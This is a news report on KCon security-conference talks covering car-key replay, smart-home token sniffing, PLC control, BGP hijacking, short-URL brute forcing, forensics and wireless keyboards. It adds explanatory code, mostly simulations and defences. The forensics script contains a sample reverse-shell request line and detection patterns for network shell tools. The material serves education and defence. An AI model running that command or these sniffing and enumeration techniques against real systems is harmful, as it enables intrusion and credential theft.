Memory forensics, smart home hijacking, short URL attacks: what did KCon get up to this time?

In many people's minds, hackers are lone swordsmen: they roam the cyber world, hide behind an IP address, and fight under their own handles, each on their own.

If anything can bring this band of rangers together, it is KCon.

Whether it is the venue, the substantive talks, or the rock music, there is always something that draws in this crowd of solitary surfers.

KCon, now in its seventh year, has taken "fusion, change" as this year's theme. Zhao Wei, CEO of the organizer Knownsec (Zhidao Chuangyu), explained: "KCon is different from traditional security conferences. It is not a business conference but an exchange platform, gathering everyone's wisdom to radiate greater energy."

So follow the Leifeng.com editor for a look at the highlights of this rather different kind of gathering.

Grand Theft Auto - digital key hacking

Perhaps machinery will always attract hackers; at any rate, hacker conferences all over the world feature flashy attacks on cars.

At this conference, security researcher Kevin2600 of Yinji also took aim at automotive security, sharing three ways to attack digital keys:

1. RF attacks. Communication between the key and the car is one-way and there is no dynamic authentication, so an attacker can interfere with the radio link between the key and the car.

Hacker Samy Kamkar once demonstrated exactly this kind of attack on stage at DEF CON; his "tool of the crime" was RollJam.

The thief uses a jammer to stop the car from receiving the key's signal, records that signal, and later replays it to open the door. A rolling code, where every press of the same key emits the next code from a shared sequence, is supposed to defeat replay, but RollJam successfully breaks this protection.

The device can be hidden on the target vehicle or in the garage, waiting for the unsuspecting owner to press the wireless key. The owner notices that the first press produces no unlock sound, but the second try succeeds: RollJam jams and records both presses, replays the first so the door opens, and keeps the second, still-unused code for itself. Samy Kamkar can then retrieve RollJam whenever he likes and press a button on the device to open the door.

2. Attacks on the sharing function. When a user shares key information with family and friends via WeChat or other channels, an attacker can easily obtain it.

3. Cracking Bluetooth encryption. This one is simpler and cruder: by capturing packets, the communication can be obtained directly and sensitive data stolen outright.
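To make the RollJam jam-and-replay sequence from attack 1 concrete, here is an added simulation. It is not code from Kevin2600's talk or from Samy Kamkar's RollJam: a fob that emits counter-based codes, a receiver with a rolling-code acceptance window, and an attacker that stores and replays presses. The HMAC tag stands in for the fob's real rolling-code cipher, and the key, serial and window size are made up for the example.

```python
import hmac
import hashlib


def _tag(key: bytes, serial: str, counter: int) -> str:
    # Stand-in for the fob's rolling-code cipher (real fobs use e.g. KeeLoq);
    # the receiver only needs a code it can recompute from the counter.
    msg = f"{serial}:{counter}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()[:8]


class Fob:
    """Key fob: every press emits (serial, counter, code) and bumps the counter."""

    def __init__(self, key: bytes, serial: str = "FOB-1"):
        self.key, self.serial, self.counter = key, serial, 0

    def press(self):
        self.counter += 1
        return (self.serial, self.counter, _tag(self.key, self.serial, self.counter))


class Car:
    """Receiver: accepts a code only if it is genuine and its counter lies in the
    window (last_seen, last_seen + WINDOW]. Anything at or below last_seen is a replay."""

    WINDOW = 16

    def __init__(self, key: bytes, serial: str = "FOB-1"):
        self.key, self.serial, self.last_seen = key, serial, 0

    def receive(self, frame) -> bool:
        serial, counter, code = frame
        if serial != self.serial:
            return False
        if not hmac.compare_digest(code, _tag(self.key, serial, counter)):
            return False
        if not (self.last_seen < counter <= self.last_seen + self.WINDOW):
            return False          # stale or too far ahead: rejected
        self.last_seen = counter  # unlock; this and every earlier code is now burnt
        return True


def plain_replay(key=b"demo-shared-secret") -> tuple:
    """Without jamming, a recorded press is useless: the car already consumed it."""
    fob, car = Fob(key), Car(key)
    frame = fob.press()
    first = car.receive(frame)      # owner unlocks normally
    replayed = car.receive(frame)   # attacker replays the same code
    return first, replayed          # (True, False)


def rolljam(key=b"demo-shared-secret") -> tuple:
    """RollJam: jam so the car never hears the press, record it, replay the older
    code so the owner gets in, and keep the newer, still-unused one."""
    fob, car = Fob(key), Car(key)
    stored = []

    # Press 1: jammed and recorded; the car hears nothing (no unlock sound).
    stored.append(fob.press())
    # Press 2: jammed and recorded as well...
    stored.append(fob.press())
    # ...and RollJam immediately replays press 1, so the car unlocks for the owner.
    owner_in = car.receive(stored.pop(0))
    # Later: the attacker replays press 2, whose counter the car has never seen.
    attacker_in = car.receive(stored.pop(0))
    # The owner's next normal press still works, so nothing looks wrong.
    owner_again = car.receive(fob.press())
    return owner_in, attacker_in, owner_again   # (True, True, True)
```

The two functions show why jamming is the essential ingredient: a plain replay is rejected because the car has already advanced past that counter, while RollJam keeps a code the car has never consumed, so the rolling-code check cannot tell it from a fresh press.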

Car keys have evolved from mechanical keys to remote controls, then RFID, and now digital keys. Phones becoming keys is the future trend, but people have to worry about their security.

Smart home security - identity hijacking

Smart home devices have entered millions of households. Once identity hijacking occurs, it can lead to leaks of private information, financial loss, and even devices being controlled and used for surveillance at will.

Taking smart speakers, smart sockets and similar devices as examples, Dai Zhongyin, a senior security engineer at Baidu, walked through the account-synchronization and device-interaction mechanisms of three manufacturers and used "identity hijacking" to gain arbitrary remote control of their devices.

In general, account synchronization depends on two things: whether the device is legitimate, which means verifying the device ID (key); and whether the token is transmitted securely, whether the device is already online, pairing over Bluetooth, or in AP (hotspot) mode. Identity hijacking can happen at either step.

For example, manufacturer A's speaker broadcasts its identity information to UDP 255.255.255.255:50000 in a fixed "protocol" format. An attacker listening on UDP port 50000 on the same network can read the user's userid and token and steal the identity credentials outright. Voice data is transmitted in the same fixed format.
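As an added example (not the vendor's protocol or code from the talk), the script below plays both roles on the loopback interface: the "speaker" sends its identity announcement, and an attacker who has simply bound the same UDP port receives and parses it. The payload layout (magic|userid|token), the credentials and the loopback addressing are all stand-ins; on the real LAN the device sends to 255.255.255.255:50000, which is what lets any host on the segment read the same bytes.

```python
import socket

HELLO_PORT = 50000  # the port described in the talk; the payload layout below is a stand-in


def build_hello(userid: str, token: str) -> bytes:
    """Hypothetical fixed-format announcement: magic|userid|token, no encryption."""
    return b"HELLO|" + userid.encode() + b"|" + token.encode()


def parse_hello(datagram: bytes):
    """Everything a listener needs to parse the fixed format; nothing secret is required."""
    parts = datagram.split(b"|")
    if len(parts) != 3 or parts[0] != b"HELLO":
        return None
    return {"userid": parts[1].decode(), "token": parts[2].decode()}


def capture_identity(host="127.0.0.1", port=HELLO_PORT, timeout=3.0):
    """Attacker binds the port first; the device's broadcast then lands in its socket."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((host, port))
    listener.settimeout(timeout)
    bound_port = listener.getsockname()[1]   # actual port (port=0 lets the OS pick a free one)

    # The "speaker": constructed credentials for the demo, not captured from any device.
    speaker = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    speaker.sendto(build_hello("user-1234", "tok-deadbeef"), (host, bound_port))
    speaker.close()

    try:
        data, src = listener.recvfrom(2048)
    except socket.timeout:
        return None
    finally:
        listener.close()
    found = parse_hello(data)
    if found:
        found["from"] = src[0]
    return found


if __name__ == "__main__":
    print(capture_identity())
```

The point of the demo is that no step requires a key, a pairing or a vulnerability: a bearer token sent in the clear to a broadcast address is a credential handed to every neighbour on the network.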

As for hijacking during device interaction, Dai Zhongyin summarized and compared manufacturers A, B and C.

In smart home apps, security issues in the WebView JavaScript bridge and app cloning through the WebView file domain lead to risks such as identity information leakage.

Dai Zhongyin also told the Leifeng.com editor that the vulnerabilities found have been reported to vendors A, B and C, and all three have completed their fixes.

Industrial network security - remote control of a certain PLC

The recent TSMC virus incident once again put industrial control security in front of the public. PLCs (programmable logic controllers) in industrial control networks have traditionally sat on isolated networks, but with the growth of the Internet more and more companies are connecting them, and that brings many security problems.

Using Snap7 (an open-source S7 communication library) and Step7 (the engineering software), Jian Siting demonstrated connecting to and programming a certain brand of PLC. Implanting remote-control code this way does not make the PLC restart and leaves no visible sign, which makes the attack harder to notice.

So what are the defensive measures? Jian Siting listed five:

1. Ensure physical and environmental security; this is also the most effective measure;

2. Enable access protection on the PLC and encrypt the project;

3. Add a DPI firewall at the PLC's network boundary that blocks downloads to the PLC;

4. Have the core firewall cut off direct access to the industrial network and set up a DMZ;

5. Add access authentication and authorization.
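Measure 3 needs a firewall that understands the PLC protocol rather than just the TCP port. The following is an added example of that inspection logic, written for the S7comm framing used by Snap7 (TPKT, then COTP, then the S7 PDU whose first parameter byte is the function code); it is not code from the talk or from any firewall product. It parses a TCP payload, names the function, and blocks the program-download and run-state functions while letting variable reads through. The sample frames are constructed in `build_s7_job`, not captured traffic, and only Job PDUs are classified (Userdata PDUs use a different parameter layout and are passed through unclassified).

```python
import struct

# S7comm function codes (parameter byte 0 of a Job PDU), as named in the Wireshark dissector.
S7_FUNCTIONS = {
    0x00: "CPU services", 0x04: "Read Var", 0x05: "Write Var",
    0x1A: "Request download", 0x1B: "Download block", 0x1C: "Download ended",
    0x1D: "Start upload", 0x1E: "Upload", 0x1F: "End upload",
    0x28: "PI-Service", 0x29: "PLC Stop", 0xF0: "Setup communication",
}
# Functions a boundary firewall should refuse from outside the cell: everything that
# changes the program or the run state (all three download stages, start/insert, stop).
BLOCKED = {0x1A, 0x1B, 0x1C, 0x28, 0x29}
ROSCTR_NAMES = {1: "Job", 2: "Ack", 3: "Ack_Data", 7: "Userdata"}


def parse_s7(payload: bytes):
    """Parse TPKT/COTP/S7comm from one TCP payload (port 102). Returns a dict or None."""
    if len(payload) < 7 or payload[0] != 0x03:          # TPKT version 3
        return None
    tpkt_len = struct.unpack(">H", payload[2:4])[0]
    if tpkt_len > len(payload):
        return None
    li = payload[4]                                      # COTP length indicator (excludes itself)
    if (payload[5] & 0xF0) != 0xF0:                      # only DT (data) TPDUs carry S7 PDUs
        return None
    s7 = payload[5 + li:tpkt_len]
    if len(s7) < 10 or s7[0] != 0x32:                    # S7 protocol id
        return None
    rosctr = s7[1]
    pdu_ref, param_len, data_len = struct.unpack(">HHH", s7[4:10])
    hdr = 12 if rosctr in (2, 3) else 10                 # Ack/Ack_Data carry error class + code
    params = s7[hdr:hdr + param_len]
    func = params[0] if (params and rosctr in (1, 3)) else None
    return {
        "rosctr": ROSCTR_NAMES.get(rosctr, rosctr), "pdu_ref": pdu_ref,
        "function": func, "name": S7_FUNCTIONS.get(func, "unclassified"),
        "data_len": data_len,
    }


def inspect(payload: bytes):
    """Firewall verdict for one payload: ('pass'|'allow'|'block', reason)."""
    pdu = parse_s7(payload)
    if pdu is None:
        return ("pass", "not an S7comm PDU")
    if pdu["rosctr"] == "Job" and pdu["function"] in BLOCKED:
        return ("block", pdu["name"])
    return ("allow", pdu["name"])


def build_s7_job(func: int, param_rest: bytes = b"", data: bytes = b"", pdu_ref: int = 1) -> bytes:
    """Constructed test frames for the example (not captured from a PLC)."""
    params = bytes([func]) + param_rest
    s7 = bytes([0x32, 0x01, 0x00, 0x00]) + struct.pack(">HHH", pdu_ref, len(params), len(data)) + params + data
    cotp = bytes([0x02, 0xF0, 0x80])                      # DT TPDU, last data unit
    return bytes([0x03, 0x00]) + struct.pack(">H", 4 + len(cotp) + len(s7)) + cotp + s7


if __name__ == "__main__":
    for f in (0x04, 0x05, 0x1A, 0x1B, 0x29):
        print(hex(f), inspect(build_s7_job(f)))
```

In a real deployment the same classification would be applied per TCP stream (reassembling across segments) and paired with an allow-list of engineering-station addresses, since "Write Var" from an unexpected source is also worth alerting on even though it is allowed here.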

The BGP security crisis

Between 2003 and 2018, dozens of well-known major incidents around the world were caused by BGP's own security flaws:

In 2003, part of Northrop Grumman's BGP network was maliciously exploited;

In 2008, Pakistan Telecom caused a YouTube outage;

In 2015, Hacking Team used a BGP hijack to assist Italian hacker groups in their attacks;

In 2017, a misconfiguration by a Google engineer cut 8 million users in Japan off the Internet for an hour;

In 2018, Amazon was hit by a BGP hijack and ETH worth $17.3 million was stolen.

In the words of Zhang Yubing, senior security researcher at 360 Threat Intelligence Center, the security flaws of BGPv4 are the largest and most serious vulnerability in the global Internet today.

BGP (Border Gateway Protocol) is the Internet's core decentralized inter-domain routing protocol, run autonomously by each network. There are three main attacks on the BGP protocol as it stands: BGP prefix hijacking, AS Path hijacking, and route leaks.

BGP prefix hijacking comes in three forms:

Idle AS snatching: announcing an unannounced prefix that one does not own and that is legitimately held by another organization;

Neighbour AS snatching: an AS next to the victim announces the victim's prefix, using its proximity to the target network to pull in nearby traffic;

Longer-mask preemption (the siphon effect): exploiting BGP's preference for the longest prefix, i.e. the most specific route, to announce more-specific prefixes and hijack all reachable segments and their entire traffic.

AS Path hijacking: AS_PATH can be modified at will, for instance with AS_PATH prepending. Lengthening the AS path lowers a route's priority, so by manipulating path lengths an attacker can draw the target network's traffic to himself and hijack it.
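To show the route-selection behaviour behind longer-mask preemption and AS_PATH manipulation, here is an added toy BGP table (not code from the talk): it keeps, per prefix, the announcement with the shortest AS_PATH and forwards by longest prefix match, which are the only two decision steps these attacks need. The AS numbers and prefixes are from the documentation ranges and the scenarios are constructed for the example.

```python
import ipaddress


class BgpTable:
    """Toy BGP decision process: per prefix keep the shortest AS_PATH (the only
    tie-breaker modelled here); forwarding picks the most specific matching prefix."""

    def __init__(self):
        self.rib = {}   # ip_network -> tuple(AS_PATH); the origin AS is the last element

    def announce(self, prefix: str, as_path):
        net = ipaddress.ip_network(prefix)
        path = tuple(as_path)
        best = self.rib.get(net)
        if best is None or len(path) < len(best):
            self.rib[net] = path

    def lookup(self, address: str):
        ip = ipaddress.ip_address(address)
        matches = [net for net in self.rib if ip in net]
        if not matches:
            return None
        net = max(matches, key=lambda n: n.prefixlen)   # longest prefix match
        return str(net), self.rib[net]


def longer_mask_hijack():
    """Siphon effect: two /25s beat the legitimate /24 for every address inside it."""
    table = BgpTable()
    table.announce("198.51.100.0/24", [64510, 64500])        # legitimate origin AS64500
    before = table.lookup("198.51.100.77")[1][-1]
    table.announce("198.51.100.0/25", [64520, 64666])        # attacker AS64666, more specific
    table.announce("198.51.100.128/25", [64520, 64666])
    after = table.lookup("198.51.100.77")[1][-1]
    return before, after        # (64500, 64666): all traffic now flows to the hijacker


def as_path_prepend():
    """Prepending lengthens a path and lowers its preference: the shorter path wins."""
    table = BgpTable()
    table.announce("203.0.113.0/24", [64510, 64500, 64500, 64500])   # prepended, via provider 64510
    table.announce("203.0.113.0/24", [64520, 64500])                  # plain, via provider 64520
    return table.lookup("203.0.113.10")[1]       # (64520, 64500)


def forged_short_path():
    """AS_PATH is not authenticated: an attacker announcing the same /24 with a
    shorter, forged path is preferred over the genuine but longer one."""
    table = BgpTable()
    table.announce("192.0.2.0/24", [64510, 64530, 64500])    # genuine, three hops
    table.announce("192.0.2.0/24", [64666])                  # attacker claims to be the origin
    return table.lookup("192.0.2.5")[1]          # (64666,)


if __name__ == "__main__":
    print(longer_mask_hijack(), as_path_prepend(), forged_short_path())
```

The three scenarios map onto the talk's categories: the first is the siphon effect (most-specific route wins regardless of path length), the second shows why prepending lowers a route's priority, and the third shows that the same preference for short paths rewards a forged AS_PATH.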

BGP route leaks. BGP routes have a reasonable propagation scope that depends on the role of each party. When a route spreads beyond its originally intended scope, that is a route leak. The results are unpredictable: a network outage, interruption of traffic between the source and target networks, or AS traversal, ISP traversal, man-in-the-middle and similar problems.

In addition, TTL modification may create its own security problems in BGP attacks. Because TTL can be customized, an attacker in a man-in-the-middle position can rewrite it so that the hop count looks normal, making the attack harder to detect.

At present the state of communication security for Internet nodes in China is not encouraging. More than 50% of exposed data is unencrypted; add to that weaknesses in encryption protocols, downgrading of the trust relationships behind encrypted communication, and the reach of hardware- and software-level supply-chain attacks, and the situation will remain unsafe for the next 5 to 10 years.

Attack and defense of short URLs

Any modern surfer is familiar with short URLs. They originated with character-limited services such as Weibo and are now widely used in text messages and emails. By incomplete statistics, 80% of vendors use short-link services, whether third-party or their own. Yet few people seem to pay attention to the security of short links.

A short-address service provides a very short URL in place of the original, possibly much longer one. When a user visits the short URL, they are normally redirected to the original.

Yan Xiu of Tencent Blade Team analysed the ten most-starred open-source short URL projects on GitHub. Their conversion algorithms fall roughly into three categories: base conversion (hexadecimal and similar), hash algorithms, and random number algorithms. Knowing the algorithm, one can guess neighbouring codes and test them; by brute-forcing in practice, the team obtained personal information, contract information, passwords and more.

The attack surface of short URLs is much broader than that. As they are used more widely, a remote-fetch function becomes SSRF if input is not strictly filtered, and the TITLE-fetching function or the display of the long URL's page becomes XSS if output is not strictly filtered.

Of course, Yan Xiu also proposed several remedies, such as:

1. Limit the request rate and total request count per IP, and block an IP that exceeds the threshold;

2. Expire short URLs that carry permissions or sensitive information;

3. Add a second authentication step to long URLs that carry permissions or sensitive information;

4. Do not use a short URL service to convert any long URL that contains sensitive information or permissions;

5. Avoid authentication methods such as plaintext tokens wherever possible.
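The following added example (not code from Yan Xiu's talk or from any of the analysed projects) covers both halves of the section: the base-conversion scheme that makes enumeration possible, with the attacker's "neighbouring codes" guess, and a hardened service that applies remedies 1, 2 and 4 from the list (random codes, expiry, refusal to shorten credential-bearing URLs, and a per-IP rate limit on resolution). The alphabet, limits and sample URLs are choices made for the example; `secrets.token_urlsafe` and `urllib.parse` are standard-library calls.

```python
import secrets
import string
import time
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

ALPHABET = string.digits + string.ascii_lowercase + string.ascii_uppercase   # base62


def encode62(n: int) -> str:
    """The common open-source scheme: base-62 encode an auto-increment row id."""
    if n == 0:
        return ALPHABET[0]
    out = []
    while n:
        n, r = divmod(n, 62)
        out.append(ALPHABET[r])
    return "".join(reversed(out))


def decode62(code: str) -> int:
    n = 0
    for ch in code:
        n = n * 62 + ALPHABET.index(ch)
    return n


def neighbours(code: str, span: int = 3):
    """Attacker's view: from one observed code, the codes issued just before and after it."""
    n = decode62(code)
    return [encode62(i) for i in range(max(0, n - span), n + span + 1) if i != n]


# Query parameters whose presence means the long URL carries a credential (remedy 4).
SENSITIVE_PARAMS = {"token", "access_token", "password", "session", "sig", "key"}


class ShortUrlService:
    """Hardened service: unguessable codes, expiry, refusal of credential URLs,
    and a per-IP sliding-window rate limit on resolution."""

    def __init__(self, ttl=3600, limit=20, window=60):
        self.ttl, self.limit, self.window = ttl, limit, window
        self.store = {}                 # code -> (long_url, expires_at)
        self.hits = defaultdict(list)   # client_ip -> request timestamps

    def shorten(self, long_url: str, now=None) -> str:
        now = time.time() if now is None else now
        params = set(parse_qs(urlsplit(long_url).query))
        if params & SENSITIVE_PARAMS:
            raise ValueError("refusing to shorten a URL that carries credentials")
        code = secrets.token_urlsafe(9)   # 72 random bits: there are no neighbours to enumerate
        self.store[code] = (long_url, now + self.ttl)
        return code

    def resolve(self, code: str, client_ip: str, now=None):
        now = time.time() if now is None else now
        recent = [t for t in self.hits[client_ip] if t > now - self.window]
        recent.append(now)
        self.hits[client_ip] = recent
        if len(recent) > self.limit:
            return "rate_limited", None          # remedy 1: brute force hits the wall
        entry = self.store.get(code)
        if entry is None:
            return "not_found", None
        long_url, expires_at = entry
        if now >= expires_at:
            del self.store[code]
            return "expired", None               # remedy 2: old links stop working
        return "ok", long_url


if __name__ == "__main__":
    print(encode62(12345), neighbours("3d7"))
    svc = ShortUrlService()
    print(svc.resolve(svc.shorten("https://example.com/contract/42"), "198.51.100.7"))
```

Note that rate limiting alone would not save a sequential scheme: with base-62 ids an attacker who sees one code knows every code ever issued, so the unguessable code is the fix and the rate limit is defence in depth.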

Spotting the "black hat": tracing the attacker through memory forensics

How do you take a memory sample from a crime scene to track down a suspect? The real technique is far more tedious than in the movies.

Wu Zhibo, a security expert at China Net Security · Guangzhou Three Zero Guards, shared a real investigation at the conference. A unit's website had been defaced, and the on-site investigation found that the logs had been wiped. Through the streamed backup configured for the access log, an intact, unaltered copy was recovered; analysis of that log suggested the attacker was controlling the host through a reverse-connect shell. By extracting memory and reverse-engineering what was found in it, the team discovered a fairly rare technique, a logic bomb, and finally found the entry point that led to the suspect's arrest.
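The first two steps of that case, reconciling the streamed log copy against the wiped local one and spotting the reverse-shell traffic in what was deleted, can be shown in code. The script below is an added example, not the investigators' tooling: the log lines are constructed in combined log format for the demo (the attacker address and payload are made up), and the indicator patterns are a small starting set a practitioner would extend.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format; not from the case in the talk.
STREAMED_COPY = """\
198.51.100.23 - - [12/Aug/2018:03:12:41 +0800] "GET /index.html HTTP/1.1" 200 4821
203.0.113.9 - - [12/Aug/2018:03:14:07 +0800] "POST /admin/upload.php HTTP/1.1" 200 512
203.0.113.9 - - [12/Aug/2018:03:14:20 +0800] "GET /uploads/x.php?cmd=bash+-i+%3E%26+%2Fdev%2Ftcp%2F203.0.113.9%2F4444+0%3E%261 HTTP/1.1" 200 0
198.51.100.31 - - [12/Aug/2018:03:15:02 +0800] "GET /news/2018.html HTTP/1.1" 200 9330
"""

# What was left on the web server after the intruder "cleaned up".
LOCAL_COPY = """\
198.51.100.23 - - [12/Aug/2018:03:12:41 +0800] "GET /index.html HTTP/1.1" 200 4821
198.51.100.31 - - [12/Aug/2018:03:15:02 +0800] "GET /news/2018.html HTTP/1.1" 200 9330
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Request patterns suggesting a reverse shell or web shell; matched after URL-decoding.
REVERSE_SHELL_HINTS = [
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp reverse shell"),
    (re.compile(r"\bbash -i\b"), "interactive bash"),
    (re.compile(r"\bnc\b.*\s-e\s"), "netcat -e"),
    (re.compile(r"[?&]cmd="), "command parameter"),
]


def parse_line(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_path"] = unquote_plus(rec["path"])
    return rec


def deleted_entries(streamed: str, local: str):
    """Lines present in the streamed copy but missing from the host's own log."""
    local_set = set(local.splitlines())
    return [ln for ln in streamed.splitlines() if ln not in local_set]


def suspicious_requests(lines):
    """Flag decoded requests that match reverse-shell or web-shell indicators."""
    hits = []
    for ln in lines:
        rec = parse_line(ln)
        if rec is None:
            continue
        reasons = [why for rx, why in REVERSE_SHELL_HINTS if rx.search(rec["decoded_path"])]
        if reasons:
            hits.append((rec["ip"], rec["decoded_path"], reasons))
    return hits


def investigate(streamed=STREAMED_COPY, local=LOCAL_COPY):
    deleted = deleted_entries(streamed, local)
    ips = sorted({parse_line(ln)["ip"] for ln in deleted if parse_line(ln)})
    return {"deleted": deleted, "suspicious": suspicious_requests(deleted), "attacker_ips": ips}


if __name__ == "__main__":
    for k, v in investigate().items():
        print(k, v)
```

The deleted set is the high-value evidence: an intruder who edits the log removes exactly the lines that identify him, so the difference between the two copies points straight at the source address and the upload that preceded the reverse shell. Which process later held that connection is what the memory image answers.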

Radio frequency attacks - from keyboard-hook Trojans to hijacking wireless keyboard-and-mouse sets

Keyboards are a fine thing; unfortunately thieves are always eyeing them. Leifeng.com (WeChat public account: Leifeng.com) earlier reported that the virtual keyboard AI.type leaked the data of 31 million users. As an everyday input tool, once a keyboard is monitored or controlled by an attacker, personal privacy is very much laid bare to him.

Specifically, past attacks mostly used keyboard-hook Trojans, but wireless keyboards are now common; going wireless has quietly expanded the attack surface and brought the physical keyboard into the attack chain through radio-frequency technology. A number of attacks on wireless keyboards already exist, most of which use RF techniques against common wireless keyboard-and-mouse sets.

Of course, speaker Shi Bing also gave security advice. For users: switch to a secure soft keyboard for sensitive operations; do not use substandard keyboards and adapters from small factories; build wireless security awareness and understand the basic parameters; and apply firmware upgrades on devices that support them.

For manufacturers: introduce a sequence number so that the radio signal changes with every transmission, and combine the sequence number with encryption, encrypting the sequence number as well, to raise the attacker's cost and difficulty.
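What the manufacturer-side advice buys can be shown with a small keyboard/dongle pair. This is an added example, not a vendor's protocol or code from Shi Bing's talk: each frame carries a sequence number, the keystroke is encrypted under a per-sequence keystream, and an authentication tag covers both. The dongle refuses replayed or tampered frames, and a sniffer sees only ciphertext. The HMAC-derived keystream is a standard-library stand-in for an AES counter-mode stream, and the pairing key is made up.

```python
import hmac
import hashlib


def _keystream(key: bytes, seq: int, length: int) -> bytes:
    """PRF-derived keystream bound to the sequence number. A stand-in for an AES
    counter-mode keystream so the example runs on the standard library alone."""
    out = b""
    block = 0
    while len(out) < length:
        out += hmac.new(key, seq.to_bytes(4, "big") + block.to_bytes(2, "big"), hashlib.sha256).digest()
        block += 1
    return out[:length]


def _xor(data: bytes, stream: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, stream))


def legacy_frame(keystroke: bytes) -> bytes:
    """What a cheap unencrypted set radiates: the keystroke itself."""
    return keystroke


class Keyboard:
    """Sender: 4-byte sequence number + encrypted keystroke + 8-byte tag per frame."""

    def __init__(self, key: bytes):
        self.key, self.seq = key, 0

    def send(self, keystroke: bytes) -> bytes:
        self.seq += 1
        seq = self.seq.to_bytes(4, "big")
        ct = _xor(keystroke, _keystream(self.key, self.seq, len(keystroke)))
        tag = hmac.new(self.key, seq + ct, hashlib.sha256).digest()[:8]
        return seq + ct + tag


class Dongle:
    """Receiver: rejects bad tags and any sequence number not newer than the last."""

    def __init__(self, key: bytes):
        self.key, self.last_seq = key, 0

    def receive(self, frame: bytes):
        if len(frame) < 13:
            return None
        seq_b, ct, tag = frame[:4], frame[4:-8], frame[-8:]
        expected = hmac.new(self.key, seq_b + ct, hashlib.sha256).digest()[:8]
        if not hmac.compare_digest(tag, expected):
            return None                      # forged or bit-flipped frame
        seq = int.from_bytes(seq_b, "big")
        if seq <= self.last_seq:
            return None                      # replayed frame
        self.last_seq = seq
        return _xor(ct, _keystream(self.key, seq, len(ct)))


def demo(key=b"pairing-key-demo"):
    kb, dongle = Keyboard(key), Dongle(key)
    frames = [kb.send(ch) for ch in (b"p", b"a", b"s")]
    typed = b"".join(dongle.receive(f) for f in frames)      # b"pas": normal typing works
    replay = dongle.receive(frames[1])                        # None: sequence 2 already consumed
    tampered = frames[2][:4] + bytes([frames[2][4] ^ 0x01]) + frames[2][5:]
    forged = dongle.receive(tampered)                         # None: tag no longer matches
    plain_leak = legacy_frame(b"p")                           # b"p": the old design hands over the key
    return typed, replay, forged, plain_leak


if __name__ == "__main__":
    print(demo())
```

The sequence number alone only stops replay; the tag is what stops an attacker from injecting his own keystrokes, and the encryption is what denies the eavesdropper the plaintext. A product needs all three, which is the "sequence number plus encryption" the talk recommends.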

Security analysis of digital wallets

This topic is not being made public for the first time; it appeared not long ago at the Kanxue (Pediy) Developer Forum. Speaker Hu Mingde brought two friends, Fu Pengfei and Sun Haoran, to the KCon stage and added new content.

First comes hardware design analysis: the hardware design, firmware information, stored data and related hardware settings. Then chip security analysis: a certain brand of chipset has a vulnerability that can be used for privilege escalation, obtaining sensitive information, enabling USB debugging, changing the IMEI, and even flashing one's own Android system.

For the security analysis of mainstream foreign hardware wallets: first, analysis of the memory layout of the STM32 series of chips, their memory protection mechanism, and ways of bypassing that protection; second, the corresponding firmware and code analysis; third, hardware security design analysis. The team then presented their approach to attacking an MCU that can be tampered with. Next, the team plans to study a larger number of hardware wallets and to research software wallets as well, focusing further on wallet security.